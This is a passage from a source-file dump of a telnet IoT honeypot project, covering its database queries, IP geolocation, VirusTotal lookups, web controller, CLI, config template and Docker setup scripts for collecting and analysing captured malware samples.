{\"search\": search, \"limit\": self.limit_urls})\n\t\n\tdef get_url(self, url):\n\t\tq = \"\"\"\n\t\tSELECT urls.url as url, urls.date as date, samples.sha256 as sample, urls.id as id\n\t\tFROM urls\n\t\tLEFT JOIN samples on samples.id = urls.sample\n\t\tWHERE urls.url = :search\n\t\t\"\"\"\t\t\n\t\treturn self.sess.execute(text(q), {\"search\": url})\n\t\t\n\tdef get_url_conns(self, id_url):\n\t\tq = \"\"\"\n\t\tSELECT conns.ip as ip, conns.user as user, conns.pass as password, conns.date as date\n\t\tFROM conns_urls\n\t\tLEFT JOIN conns on conns.id = conns_urls.id_conn\n\t\tWHERE conns_urls.id_url = :id_url\n\t\tORDER BY conns.date DESC\n\t\tLIMIT :limit\n\t\t\"\"\"\t\t\n\t\treturn self.sess.execute(text(q), {\"id_url\": id_url, \"limit\" : self.limit_samples})\n\t\n\tdef get_url_conns_count(self, id_url):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(conns_urls.id_conn) as count\n\t\tFROM conns_urls\n\t\tWHERE conns_urls.id_url = :id_url\n\t\t\"\"\"\t\t\n\t\treturn self.sess.execute(text(q), {\"id_url\": id_url})\n\n\tdef get_sample_stats(self, date_from = 0):\n\t\tq = \"\"\"\n\t\tselect\n\t\t\tsamples.name as name, samples.sha256 as sha256,\n\t\t\tCOUNT(samples.id) as count, MAX(conns.date) as lastseen,\n\t\t\tsamples.length as length, samples.result as result\n\t\tfrom conns_urls\n\t\tINNER JOIN conns on conns_urls.id_conn = conns.id\n\t\tINNER JOIN urls on conns_urls.id_url = urls.id\n\t\tINNER JOIN samples on urls.sample = samples.id\n\t\tWHERE conns.date > :from\n\t\tGROUP BY samples.id\n\t\tORDER BY count DESC\n\t\tLIMIT :limit\"\"\"\n\t\treturn self.sess.execute(text(q), {\"from\": date_from, \"limit\": self.limit_samples})\n\n\tdef history_global(self, fromdate, todate, delta=3600):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour\n\t\tFROM conns\n\t\tWHERE conns.date >= :from\n\t\tAND conns.date <= :to\n\t\tGROUP BY hour\n\t\t\"\"\"\n\t\treturn 
self.sess.execute(text(q), {\"from\": fromdate, \"to\": todate, \"delta\": delta})\n\t\n\tdef history_sample(self, id_sample, fromdate, todate, delta=3600):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour\n\t\tFROM conns\n\t\tINNER JOIN conns_urls on conns_urls.id_conn = conns.id\n\t\tINNER JOIN urls on conns_urls.id_url = urls.id\n\t\tWHERE urls.sample = :id_sample\n\t\tAND conns.date >= :from\n\t\tAND conns.date <= :to\n\t\tGROUP BY hour\n\t\tORDER BY hour ASC\n\t\t\"\"\"\n\t\treturn self.sess.execute(text(q), {\"from\": fromdate, \"to\": todate, \"delta\": delta, \"id_sample\" : id_sample})\n\n\tdef get_samples(self):\n\t\treturn self.sess.execute(samples.select().limit(self.limit_samples))\n\t\n\tdef get_sample(self, sha256):\n\t\treturn self.sess.execute(samples.select().where(samples.c.sha256 == sha256))\n\t\nprint(\"DB Setup done\")\n\n"
  },
  {
    "path": "backend/ipdb/.gitignore",
    "content": "*.CSV\n*.csv\n"
  },
  {
    "path": "backend/ipdb/__init__.py",
    "content": ""
  },
  {
    "path": "backend/ipdb/ipdb.py",
    "content": "\nimport csv\nimport ipaddress\nimport struct\nimport os\n\ndef ipstr2int(ip):\n\tip = unicode(ip)\n\tip = ipaddress.IPv4Address(ip).packed\n\tip = struct.unpack(\"!I\", ip)[0]\n\treturn ip\n\nclass Entry:\n\tdef __init__(self, start, end, value):\n\t\tself.start = int(start)\n\t\tself.end   = int(end)\n\t\tself.value = value\n\nclass IPTable:\n\tdef __init__(self, fname):\n\t\tself.tzlist = []\n\t\tiplocfile = os.path.join(os.path.dirname(__file__), fname)\n\t\twith open(iplocfile, \"rb\") as ipcsv:\n\t\t\treader = csv.reader(ipcsv, delimiter=',', quotechar='\"')\n\t\t\tfor row in reader:\n\t\t\t\te = Entry(row[0], row[1], row)\n\t\t\t\tself.tzlist.append(e)\n\n\t# binary search over the sorted range list; 'end' is exclusive\n\tdef find_i(self, ip, start, end):\n\t\tif end - start < 100:\n\t\t\tfor i in range(start, end):\n\t\t\t\tobj = self.tzlist[i]\n\t\t\t\tif obj.start <= ip and ip <= obj.end:\n\t\t\t\t\treturn obj.value\n\t\t\treturn None\n\t\telse:\n\t\t\tmid = start + (end - start) / 2\n\t\t\tval = self.tzlist[mid].start\n\t\t\tif ip < val:   return self.find_i(ip, start, mid)\n\t\t\telif ip > val: return self.find_i(ip, mid, end)\n\t\t\telse:          return self.tzlist[mid].value\n\t\t\n\tdef __iter__(self):\n\t\treturn self.tzlist.__iter__()\n\t\n\tdef find_int(self, ip):\n\t\treturn self.find_i(ip, 0, len(self.tzlist))\n\n\tdef find(self, ip):\n\t\treturn self.find_i(ipstr2int(ip), 0, len(self.tzlist))\n\ndef get_geo():\n\treturn IPTable(\"IP2LOCATION-LITE-DB11.CSV\")\n\ndef get_asn():\n\treturn IPTable(\"IP2LOCATION-LITE-ASN.CSV\")\n\ndef get_geo_iter():\n\tiplocfile = os.path.join(os.path.dirname(__file__), \"IP2LOCATION-LITE-DB11.CSV\")\n\tfp = open(iplocfile, \"rb\")\n\treturn csv.reader(fp, delimiter=',', quotechar='\"')\n\nclass IPDB:\n\tdef __init__(self):\n\t\tself.geo = get_geo()\n\t\tself.asn = get_asn()\n\t\t\n\tdef find(self, ip):\n\t\tgeo = self.geo.find(ip)\n\t\tasn = self.asn.find(ip)\n\t\t\n\t\tif geo != None and asn != None:\n\t\t\tr = {}\n\t\t\tr[\"asn\"]      = 
int(asn[3])\n\t\t\tr[\"ipblock\"]  = asn[2]\n\t\t\tr[\"country\"]  = geo[2]\n\t\t\tr[\"region\"]   = geo[4]\n\t\t\tr[\"city\"]     = geo[5]\n\t\t\tr[\"zip\"]      = geo[8]\n\t\t\tr[\"lon\"]      = float(geo[7])\n\t\t\tr[\"lat\"]      = float(geo[6])\n\t\t\tr[\"timezone\"] = geo[9]\n\t\t\treturn r\n\t\telse:\n\t\t\treturn None\n\nif __name__ == \"__main__\":\n\tdb = IPDB()\n\tprint db.find(\"217.81.94.77\")\n\n\n"
  },
  {
    "path": "backend/virustotal.py",
    "content": "import requests\nimport time\nimport db\nimport Queue\n\nfrom util.config import config\n\n\nclass QuotaExceededError(Exception):\t\t\n\tdef __str__(self):\n\t\treturn \"QuotaExceededError: Virustotal API Quota Exceeded\"\n\nclass Virustotal:\n\tdef __init__(self, key):\n\t\tself.api_key    = key\n\t\tself.url        = \"https://www.virustotal.com/vtapi/v2/\"\n\t\tself.user_agent = \"Telnet Honeybot Backend\"\n\t\tself.engines    = [\"DrWeb\", \"Kaspersky\", \"ESET-NOD32\"]\n\t\t\n\t\tself.queue      = Queue.Queue()\n\t\tself.timeout    = 0\n\n\tdef req(self, method, url, files=None, params=None, headers=None):\n\t\tprint \"VT \" + url\n\t\tr = None\n\t\tif method == \"GET\":\n\t\t\tr = requests.get(url, files=files, params=params, headers=headers)\n\t\telif method == \"POST\":\n\t\t\tr = requests.post(url, files=files, params=params, headers=headers)\n\t\telse:\n\t\t\traise ValueError(\"Unknown Method: \" + str(method))\n\n\t\tif r.status_code == 204:\n\t\t\traise QuotaExceededError()\n\t\telse:\n\t\t\treturn r\n\n\tdef upload_file(self, f, fname):\n\t\tfp      = open(f, 'rb')\n\t\tparams  = {'apikey': self.api_key}\n\t\tfiles   = {'file': (fname, fp)}\n\t\theaders = { \"User-Agent\" : self.user_agent }\n\t\tres     = self.req(\"POST\", self.url + 'file/scan', files=files, params=params, headers=headers)\n\t\tjson    = res.json()\n\t\tfp.close()\n\t\t\n\t\tif json[\"response_code\"] == 1:\n\t\t\treturn json\n\t\telse:\n\t\t\treturn None\n\n\tdef query_hash_sha256(self, h):\n\t\tparams  = { 'apikey': self.api_key, 'resource': h }\n\t\theaders = { \"User-Agent\" : self.user_agent }\n\t\tres     = self.req(\"GET\", self.url + \"file/report\", params=params, headers=headers)\n\n\t\tjson = res.json()\n\n\t\tif json[\"response_code\"] == 1:\n\t\t\treturn json\n\t\telse:\n\t\t\treturn None\n\n\tdef put_comment(self, obj, msg):\n\t\tres = None\n\t\tparams  = { 'apikey': self.api_key, 'resource': obj, \"comment\": msg }\n\t\theaders = { \"User-Agent\" : 
self.user_agent }\n\t\tres     = self.req(\"POST\", self.url + \"comments/put\", params=params, headers=headers)\n\t\tjson    = res.json()\n\n\t\tif json[\"response_code\"] == 1:\n\t\t\treturn json\n\t\telse:\n\t\t\treturn None\n\t\t\n\tdef get_best_result(self, r):\n\t\tif r and r.get(\"scans\"):\n\t\t\tfor e in self.engines:\n\t\t\t\tif e in r[\"scans\"] and r[\"scans\"][e][\"detected\"]:\n\t\t\t\t\treturn r[\"scans\"][e][\"result\"]\n\t\t\tfor e,x in r[\"scans\"].iteritems():\n\t\t\t\tif x[\"detected\"]:\n\t\t\t\t\treturn x[\"result\"]\n\t\t\treturn None\n\t\telse:\n\t\t\treturn None"
  },
  {
    "path": "backend/virustotal_fill_db.py",
    "content": "import os\n\nfrom util.dbg import dbg\nfrom virustotal import Virustotal\nfrom sampledb import Sampledb\n\nvt  = Virustotal()\nsdb = Sampledb()\n\n# Engines on vt providing good results\nengines = [\"DrWeb\", \"Kaspersky\", \"ESET-NOD32\"]\n\ndef getName(r):\n\tif r[\"scans\"]:\n\t\tfor e in engines:\n\t\t\tif r[\"scans\"][e] and r[\"scans\"][e][\"detected\"]:\n\t\t\t\treturn r[\"scans\"][e][\"result\"]\n\t\tfor e,x in r[\"scans\"].iteritems():\n\t\t\tif x[\"detected\"]:\n\t\t\t\treturn x[\"result\"]\n\t\treturn None\n\telse:\n\t\treturn None\n\n#sdb.sql.execute('ALTER TABLE samples ADD COLUMN result TEXT')\n#sdb.sql.commit()\nfor row in sdb.sql.execute('SELECT id, sha256 FROM samples WHERE result is NULL'):\n\tr   = vt.query_hash_sha256(row[1])\n\tres = str(getName(r))\n\tprint(row[1] + \": \" + res)\n\tsdb.sql.execute('UPDATE samples SET result = ? WHERE id = ?', (res, row[0]))\n\tsdb.sql.commit()\n\n"
  },
  {
    "path": "backend/webcontroller.py",
    "content": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\nimport math\n\nimport additionalinfo\nimport ipdb.ipdb\n\nfrom sqlalchemy import desc, func, and_, or_, not_\nfrom functools import wraps\nfrom simpleeval import simple_eval\nfrom argon2 import argon2_hash\n\nfrom db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper, conns_conns\nfrom virustotal import Virustotal\n\nfrom cuckoo import Cuckoo\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nfrom difflib import ndiff\n\nclass WebController:\n\n\tdef __init__(self):\n\t\tself.session  = None\n\n\t@db_wrapper\n\tdef get_connection(self, id):\n\t\tconnection = self.session.query(Connection).filter(Connection.id == id).first()\n\n\t\tif connection:\n\t\t\treturn connection.json(depth=1)\n\t\telse:\n\t\t\treturn None\n\n\t@db_wrapper\n\tdef get_connections(self, filter_obj={}, older_than=None):\n\t\tquery = self.session.query(Connection).filter_by(**filter_obj)\n\n\t\tif older_than:\n\t\t\tquery = query.filter(Connection.date < older_than)\n\n\t\tquery = query.order_by(desc(Connection.date))\n\n\t\tconnections = query.limit(32).all()\n\t\treturn map(lambda connection : connection.json(), connections)\n\n\t@db_wrapper\n\tdef get_connections_fast(self):\n\t\tconns = self.session.query(Connection).all()\n\n\t\tclist = []\n\t\tfor conn in conns:\n\t\t\tclist.append({\n\t\t\t\t\"id\": conn.id,\n\t\t\t\t\"ip\": conn.ip,\n\t\t\t\t\"conns_before\": map(lambda c: c.id, conn.conns_before),\n\t\t\t\t\"conns_after\": map(lambda c: c.id, conn.conns_after)\n\t\t\t})\n\n\t\treturn clist\n\t\t\n\t##\n\t\n\t@db_wrapper\n\tdef get_networks(self):\n\t\tnetworks = self.session.query(Network).all()\n\t\tret      = []\n\t\tfor network in networks:\n\t\t\tif len(network.samples) > 0 and network.nb_firstconns >= 10:\n\t\t\t\tn   = network.json(depth = 0)\n\t\t\t\t# ips = set()\n\t\t\t\t# for connection in 
network.connections:\n\t\t\t\t# \tips.add(connection.ip)\n\t\t\t\t# n[\"ips\"] = list(ips)\n\t\t\t\tret.append(n)\n\t\treturn ret\n\t\n\t@db_wrapper\n\tdef get_network(self, net_id):\n\t\tnetwork  = self.session.query(Network).filter(Network.id == net_id).first()\n\t\tret      = network.json()\n\t\t\n\t\thoneypots              = {}\n\t\tinitialconnections     = filter(lambda connection: len(connection.conns_before) == 0, network.connections)\n\t\tret[\"connectiontimes\"] = map(lambda connection: connection.date, initialconnections)\n\t\t\n\t\thas_infected = set([])\n\t\tfor connection in network.connections:\n\t\t\tif connection.backend_user.username in honeypots:\n\t\t\t\thoneypots[connection.backend_user.username] += 1\n\t\t\telse:\n\t\t\t\thoneypots[connection.backend_user.username] = 1\n\n\t\t\tfor connection_before in connection.conns_before:\n\t\t\t\tif connection.ip != connection_before.ip:\n\t\t\t\t\thas_infected.add((\"i:\" + connection.ip, \"i:\" + connection_before.ip))\n\n\t\t\tfor url in connection.urls:\n\t\t\t\thas_infected.add((\"u:\" + url.url, \"i:\" + connection.ip))\t\t\n\t\t\t\t\n\t\t\t\tif url.sample:\n\t\t\t\t\thas_infected.add((\"s:\" + url.sample.sha256, \"u:\" + url.url))\n\n\t\tret[\"has_infected\"] = list(has_infected)\n\t\tret[\"honeypots\"]    = honeypots\n\t\t\n\t\treturn ret\n\t\n\t@db_wrapper\n\tdef get_network_history(self, not_before, not_after, network_id):\n\t\tgranularity = float(3600 * 24) # 1 day\n\t\ttimespan    = float(not_after - not_before)\n\t\t\n\t\tif timespan < 3600 * 24 * 2:\n\t\t\tgranularity = float(3600) * 2\n\t\t\n\t\tconns = self.session.query(Connection.date)\n\t\tconns = conns.filter(Connection.network_id == network_id)\n\t\tconns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after))\n\t\t\n\t\t# Filter out subsequent connections\n\t\tconns = conns.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last)\n\t\tconns = conns.filter(conns_conns.c.id_last == None)\n\t\t\n\t\tret = 
[0] * int(math.ceil(timespan / granularity))\n\t\t\n\t\tfor i in range(len(ret)):\n\t\t\tret[i] = [ not_before + i * granularity, 0 ]\n\t\t\n\t\tfor date in conns.all():\n\t\t\ti = int((date[0] - not_before) / granularity)\n\t\t\tret[i][1] += 1\n\t\t\t\n\t\treturn ret\n\t\n\t@db_wrapper\n\tdef get_biggest_networks_history(self, not_before, not_after):\n\t\t\n\t\tMAX_NETWORKS = 4\n\t\t\n\t\tn = self.session.query(Connection.network_id, func.count(Connection.network_id))\n\t\tn = n.filter(and_(not_before < Connection.date, Connection.date < not_after))\n\t\t\n\t\t# Filter out subsequent connections\n\t\tn = n.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last)\n\t\tn = n.filter(conns_conns.c.id_last == None)\n\t\t\n\t\tn = n.group_by(Connection.network_id)\n\t\tn = n.order_by(func.count(Connection.network_id).desc())\n\t\t\n\t\tdata = n.all()\n\t\t\n\t\tnb_networks = min(MAX_NETWORKS, len(data))\n\t\t\n\t\tr = [0] * nb_networks\n\t\t\n\t\ti = 0\n\t\tfor net in data[:nb_networks]:\n\t\t\t\n\t\t\tnetwork = self.session.query(Network).filter(Network.id == net[0]).first()\n\t\t\t\n\t\t\tif (network != None):\n\t\t\t\tr[i] = { \"network\": network.json(), \"data\": self.get_network_history(not_before, not_after, network.id) }\n\t\t\t\ti   += 1\n\t\t\n\t\treturn r\n\t\n\t@db_wrapper\n\tdef get_connection_locations(self, not_before, not_after, network_id = None):\n\t\tconns = self.session.query(Connection.lat, Connection.lon)\n\t\t\n\t\tconns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after))\n\t\t\n\t\tif network_id:\n\t\t\tconns = conns.filter(Connection.network_id == network_id)\n\t\t\t\n\t\tconns = conns.all()\n\t\t\n\t\treturn conns\n\n\t##\n\t\n\t@db_wrapper\n\tdef get_malwares(self):\n\t\tmalwares = self.session.query(Malware).all()\n\t\treturn map(lambda m: m.json(), malwares)\n\n\t##\n\n\t@db_wrapper\n\tdef get_sample(self, sha256):\n\t\tsample = self.session.query(Sample).filter(Sample.sha256 == sha256).first()\n\t\treturn 
sample.json(depth=1) if sample else None\n\n\t@db_wrapper\n\tdef get_newest_samples(self):\n\t\tsamples = self.session.query(Sample).order_by(desc(Sample.date)).limit(16).all()\n\t\treturn map(lambda sample : sample.json(), samples)\n\n\t##\n\n\t@db_wrapper\n\tdef get_url(self, url):\n\t\turl_obj = self.session.query(Url).filter(Url.url == url).first()\n\t\treturn url_obj.json(depth=1) if url_obj else None\n\n\t@db_wrapper\n\tdef get_newest_urls(self):\n\t\turls = self.session.query(Url).order_by(desc(Url.date)).limit(16).all()\n\t\treturn map(lambda url : url.json(), urls)\n\n\t##\n\n\t@db_wrapper\n\tdef get_tag(self, name):\n\t\ttag = self.session.query(Tag).filter(Tag.name == name).first()\n\t\treturn tag.json(depth=1) if tag else None\n\n\t@db_wrapper\n\tdef get_tags(self):\n\t\ttags = self.session.query(Tag).all()\n\t\treturn map(lambda tag : tag.json(), tags)\n\n\t##\n\n\t@db_wrapper\n\tdef get_country_stats(self):\n\t\tstats = self.session.query(func.count(Connection.country), Connection.country).group_by(Connection.country).all()\n\t\treturn stats\n\n\t##\n\n\t@db_wrapper\n\tdef get_asn(self, asn):\n\t\tasn_obj = self.session.query(ASN).filter(ASN.asn == asn).first()\n\n\t\tif asn_obj:\n\t\t\treturn asn_obj.json(depth=1)\n\t\telse:\n\t\t\treturn None\n\n\t##\n\t\n\t@db_wrapper\n\tdef connhash_tree_lines(self, lines, mincount):\n\t\tlength     = 1 + lines * 4\n\t\tothercount = 0\n\t\t\n\t\tret   = {}\n\t\tdbres = self.session.query(func.count(Connection.id),\n\t\t\tfunc.substr(Connection.connhash, 0, length).label(\"c\"),\n\t\t\tConnection.stream, Connection.id).group_by(\"c\").all()\n\n\t\tfor c in dbres:\n\t\t\tcount    = c[0]\n\t\t\tconnhash = c[1]\n\t\t\tif count > mincount:\n\t\t\t\tev_in = filter(lambda ev : ev[\"in\"], json.loads(c[2]))\n\n\t\t\t\tif len(ev_in) >= lines:\n\t\t\t\t\tret[connhash] = {\n\t\t\t\t\t\t\"count\": c[0],\n\t\t\t\t\t\t\"connhash\": connhash,\n\t\t\t\t\t\t\"text\": ev_in[lines-1][\"data\"],\n\t\t\t\t\t\t\"childs\": 
[],\n\t\t\t\t\t\t\"sample_id\": c[3]\n\t\t\t\t\t}\n\t\t\telse:\n\t\t\t\tothercount += count\n\n\t\treturn ret\n\n\t@db_wrapper\n\tdef connhash_tree(self, layers):\n\t\ttree  = self.connhash_tree_lines(1, 10)\n\t\tlayer = tree\n\n\t\tfor lines in range(2,layers+1):\n\t\t\tlength = (lines-1) * 4\n\t\t\tnew_layer = self.connhash_tree_lines(lines, 0)\n\t\t\tfor connhash in new_layer:\n\t\t\t\tconnhash_old = connhash[:length]\n\t\t\t\tif connhash_old in layer:\n\t\t\t\t\tparent = layer[connhash_old]\n\t\t\t\t\tparent[\"childs\"].append(new_layer[connhash])\n\t\t\tlayer = new_layer\n\n\t\treturn tree\n\t\t\t\t\n\t\t\t\n"
  },
  {
    "path": "backend.py",
    "content": "import sys\nimport json\nimport traceback\n\nfrom util.config import config\n\nif len(sys.argv) > 1 and sys.argv[1] == \"cleardb\":\n\tprint \"This will DELETE ALL DATA except users and cached asn data\"\n\tprint \"from the database currently used at:\"\n\tprint \"\"\n\tprint \"    \" + config.get(\"sql\")\n\tprint \"\"\n\tprint \"If you really want to DELETE ALL DATA, type 'delete' and press enter.\"\n\tprint \"\"\n\tdoit = sys.stdin.readline()\n\tprint \"\"\n\tif doit.strip() != \"delete\":\n\t\tprint \"ABORTED\"\n\t\tsys.exit(0)\n\n\tfrom backend.db import delete_everything\n\tdelete_everything()\n\tsys.exit(0)\n\n# Import from backend is faster:\n# Benchmark:\n# \tCPU:        Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz\n# \tStorage:    Samsung SSD PM961\n#\tFile size:  7,3M\n#\tSQLite:\n#\t\thoneypot: 0m26,056s\n#\t\tbackend:  0m21,445s\n#\tMariadb:\n#\t\thoneypot: 0m32,684s\n#\t\tbackend:  0m14,849s\n\nif len(sys.argv) > 2 and sys.argv[1] == \"import\":\n\tfrom backend.clientcontroller import ClientController\n\n\tfname = sys.argv[2]\n\tif len(sys.argv) > 3:\n\t\tusername = sys.argv[3]\n\telse:\n\t\tusername = config.get(\"backend_user\")\n\n\tprint \"Importing \" + fname + \" as user \" + username\n\n\twith open(fname, \"rb\") as fp:\n\t\tctrl = ClientController()\n\t\tfor line in fp:\n\t\t\tline = line.strip()\n\t\t\tobj  = json.loads(line)\n\n\t\t\tif obj[\"ip\"] != None and obj[\"date\"] >= 1515899912:\n\t\t\t\tprint \"conn   \" + obj[\"ip\"] + \" date \" + str(obj[\"date\"])\n\t\t\t\tobj[\"backend_username\"] = username\n\t\t\t\ttry:\n\t\t\t\t\tctrl.put_session(obj)\n\t\t\t\texcept:\n\t\t\t\t\tprint \"Cannot Put Session\"\n\t\t\t\t\tprint \"----------------------------\"\n\t\t\t\t\ttraceback.print_exc()\n\t\t\t\t\tprint \"----------------------------\"\n\t\t\t\t\tprint repr(obj)\n\t\t\t\t\tsys.exit(0)\n\tsys.exit(0)\n\nif len(sys.argv) > 1:\n\tprint \"Unknown action '\" + sys.argv[1] + \"'\"\n\tprint \"Available commands:\"\n\tprint \"    
import file.json : imports raw log file\"\nprint \"    cleardb          : deletes all data from db\"\nprint \"To simply start the backend, use no command at all\"\nsys.exit(0)\n\nfrom backend.backend import run\nrun()\n\n"
  },
  {
    "path": "config.dist.yaml",
    "content": "# This is the default (distribution) config file\n# For local configuration, please create and edit the file \"config.yaml\",\n# this ensures your configuration to endure a update using git pull\n\n# this file is in YAML format\n# If you don't know YAML, check https://de.wikipedia.org/wiki/YAML\n# or just copy around existing entries\n\n#############################################\n# Global config\n# used by both honeypot AND backend\n\n# Credentials for authetification\n# Used by honeypot only\n# If not set, will be randomly generated\n# If the backend cannot find a user with id == 1 in its database,\n#   it will generate one using this credentials (or the ones autogenerated)\n# backend_user: \"CHANGEME\"\n# backend_pass: \"CHANGEME\"\n\n##############################################\n# Honeypot configuration\n\n# Backend URL to which honeypot will connect to to store data\nbackend: \"http://localhost:5000\"\n\n# Write raw data to logfile, can be imported into backend db later\n#   does include everything EXCEPT sample contents\nlog_raw: null\n\n# Save samples in sample_dir\nlog_samples: False\n\n# Do not download any samples, use their url as content\n#   useful for debugging\nfake_dl: false\n\n# Telnet port\ntelnet_addr: \"\"\ntelnet_port: 2323\n\n# Timeout in seconds for telnet session. 
Will expire if no bytes can be read from socket.\ntelnet_session_timeout: 60\n\n# Maximum session length in seconds.\ntelnet_max_session_length: 120\n\n# Minimum time between 2 connection from the same ip, if closer together\n# they will be refused\ntelnet_ip_min_time_between_connections: 30\n\n#############################################\n# Backend configuration\n\n# sqlalchemy sql connect string\n# examples:\n# using sqlite: \"sqlite:///database.db\"\n# using mysql:  \"\"mysql+mysqldb://USER:PASSWORD@MYSQL_HOST/DATABASE_NAME\",\"\nsql: \"sqlite:///database.db\"\n\n# IP Address and port for http interface\nhttp_port: 5000\nhttp_addr: \"127.0.0.1\"\n\n# Max connections to sql db, maybe restricted in some scenarios\nmax_db_conn: 1\n\n# Directory in which samples are stored\nsample_dir: \"samples\"\n\n# Virustotal API key\nvt_key:       \"GET_YOUR_OWN\"\nsubmit_to_vt: false\n\n# Enable or Disable IP to ASN resolution\n# Options: \"none\" | \"offline\" | \"online\"\n#    offline works by importing data from https://lite.ip2location.com/ - dowload must be done manually\n#    online  works by querying origin.asn.cymru.com\nip_to_asn_resolution: \"online\"\n\ncuckoo_enabled:  false,\ncuckoo_url_base: \"http://127.0.0.1:8090\"\ncuckoo_user:     \"user\"\ncuckoo_passwd:   \"passwd\"\ncuckoo_force:    0\n\n"
  },
  {
    "path": "create_config.sh",
    "content": "#!/bin/bash\n\nif [ -f config.yaml ]; then\n\techo \"config.yaml already exists, aborting\"\n\texit\nfi\n\nuser=admin\npass=$(openssl rand -hex 16)\nsalt=$(openssl rand -hex 16)\n\necho \"backend_user: $user\" >> config.yaml\necho \"backend_pass: $pass\" >> config.yaml\necho \"backend_salt: $salt\" >> config.yaml\n\n"
  },
  {
    "path": "create_docker.sh",
    "content": "#!/bin/bash\n\nif [ -f config.yaml ]; then\n\techo -n \"config.yaml already exists, delete it? (Y/n): \"\n\tread force\n\tif [ \"$force\" = \"Y\" ] || [ \"$force\" = \"y\" ] || [ \"$force\" = \"\" ]; then\n\t\trm config.yaml\n\telse\n\t\techo aborting...\n\t\texit 1\n\tfi\nfi\n\nif [ -f docker-compose.yml ]; then\n\techo -n \"docker-compose.yml already exists, delete it? (Y/n): \"\n\tread force\n\tif [ \"$force\" = \"Y\" ] || [ \"$force\" = \"y\" ] || [ \"$force\" = \"\" ]; then\n\t\trm docker-compose.yml\n\telse\n\t\techo aborting...\n\t\texit 1\n\tfi\nfi\n\necho -n \"DB: Use maria or sqlite? (maria/sqlite): \"\nread dbbackend\nif [ \"$dbbackend\" != \"maria\" ] && [ \"$dbbackend\" != \"sqlite\" ]; then\n\techo \"$dbbackend is not valid\"\n\texit 1\nfi\n\n# Honeypot setup\necho \" - Writing honeypot config\"\nuser=admin\npass=$(openssl rand -hex 16)\nsalt=$(openssl rand -hex 16)\necho \"backend_user: $user\" >> config.yaml\necho \"backend_pass: $pass\" >> config.yaml\necho \"backend_salt: $salt\" >> config.yaml\necho \"http_addr: \\\"0.0.0.0\\\"\" >> config.yaml\necho \"telnet_addr: \\\"0.0.0.0\\\"\" >> config.yaml\necho \"backend: \\\"http://backend:5000\\\"\" >> config.yaml\necho \"log_samples: True\" >> config.yaml\necho \"sample_dir: samples\" >> config.yaml\n\n# DB setup\nif [ \"$dbbackend\" = \"maria\" ]; then\n\tdbpass=$(openssl rand -hex 16)\n\tsql=\"mysql+mysqldb://honey:$dbpass@honeydb/honey\"\n\techo sql: \\\"$sql\\\" >> config.yaml\nfi\n\n# docker-compose setup\necho \" - Writing docker-compose.yml\"\ncat << EOF >> docker-compose.yml\nversion: \"3.7\"\nservices:\n  honeypot:\n    depends_on:\n      - backend\n    image: telnet-iot-honeypot:hot\n    restart: always\n    entrypoint:\n      - python\n      - honeypot.py\n    ports:\n      - \"2323:2323\"\n    volumes:\n      - \"./samples:/usr/src/app/samples\"\n  backend:\n    build: .\n    image: telnet-iot-honeypot:hot\n    restart: always\n    entrypoint:\n      - python\n      - 
backend.py\n    ports:\n      - \"5000:5000\"\n    volumes:\n      - \"./samples:/usr/src/app/samples\"\nEOF\n\nif [ \"$dbbackend\" = \"maria\" ]; then\n\tcat << EOF >> docker-compose.yml\n    depends_on:\n      - honeydb\n  honeydb:\n    image: mariadb:latest\n    restart: always\n    environment:\n      MYSQL_RANDOM_ROOT_PASSWORD: \"yes\"\n      MYSQL_DATABASE: honey\n      MYSQL_USER: honey\n      MYSQL_PASSWORD: $dbpass\nEOF\nfi\n\necho -n \"Start honeypot using docker-compose now? d = start using daemon flag (Y/n/d): \"\nread runit\nif [ \"$runit\" = \"d\" ]; then\n\tsudo docker-compose up -d\nelif [ \"$runit\" = \"Y\" ] || [ \"$runit\" = \"y\" ] || [ \"$runit\" = \"\" ]; then\n\tsudo docker-compose up\nfi\n\n"
  },
  {
    "path": "honeypot/__init__.py",
    "content": ""
  },
  {
    "path": "honeypot/__main__.py",
    "content": "import signal\n\nfrom telnet import Telnetd\nfrom util.dbg import dbg\n\ndef signal_handler(signal, frame):\n\tdbg('Ctrl+C')\n\tsrv.stop()\n\nsignal.signal(signal.SIGINT, signal_handler)\n\nsrv = Telnetd(2222)\nsrv.run()"
  },
  {
    "path": "honeypot/client.py",
    "content": "import requests\nimport requests.exceptions\nimport requests.auth\n\nimport json\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nclass Client:\n\n\tdef __init__(self):\n\t\tself.user     = config.get(\"backend_user\")\n\t\tself.password = config.get(\"backend_pass\")\n\t\tself.url      = config.get(\"backend\")\n\t\tself.auth     = requests.auth.HTTPBasicAuth(self.user, self.password)\n\n\t\tself.test_login()\n\t\n\tdef test_login(self):\n\t\ttry:\n\t\t\tr = requests.get(self.url + \"/connections\", auth=self.auth, timeout=20.0)\n\t\texcept:\n\t\t\traise IOError(\"Cannot connect to backend\")\n\t\ttry:\n\t\t\tr = requests.get(self.url + \"/login\", auth=self.auth, timeout=20.0)\n\t\t\tif r.status_code != 200:\n\t\t\t\traise IOError()\n\t\texcept:\n\t\t\traise IOError(\"Backend authentification test failed, check config.json\")\n\n\tdef put_session(self, session, retry=True):\n\t\t\n\t\ttry:\n\t\t\tr = requests.put(self.url + \"/conns\", auth=self.auth, json=session, timeout=20.0)\n\t\texcept requests.exceptions.RequestException:\n\t\t\tdbg(\"Cannot connect to backend\")\n\t\t\treturn []\n\t\t\n\t\tif r.status_code == 200:\n\t\t\treturn r.json()\n\t\telif retry:\n\t\t\tmsg = r.raw.read()\n\t\t\tdbg(\"Backend upload failed, retrying (\" + str(msg) + \")\")\n\t\t\treturn self.put_session(session, False)\n\t\telse:\n\t\t\tmsg = r.raw.read()\n\t\t\traise IOError(msg)\n\n\tdef put_sample(self, data, retry=True):\n\t\t\n\t\ttry:\n\t\t\tr = requests.post(self.url + \"/file\", auth=self.auth, data=data, 